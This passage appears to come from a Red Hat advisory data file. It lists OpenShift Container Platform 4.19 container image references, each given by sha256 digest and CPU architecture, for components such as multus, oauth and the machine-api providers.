"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
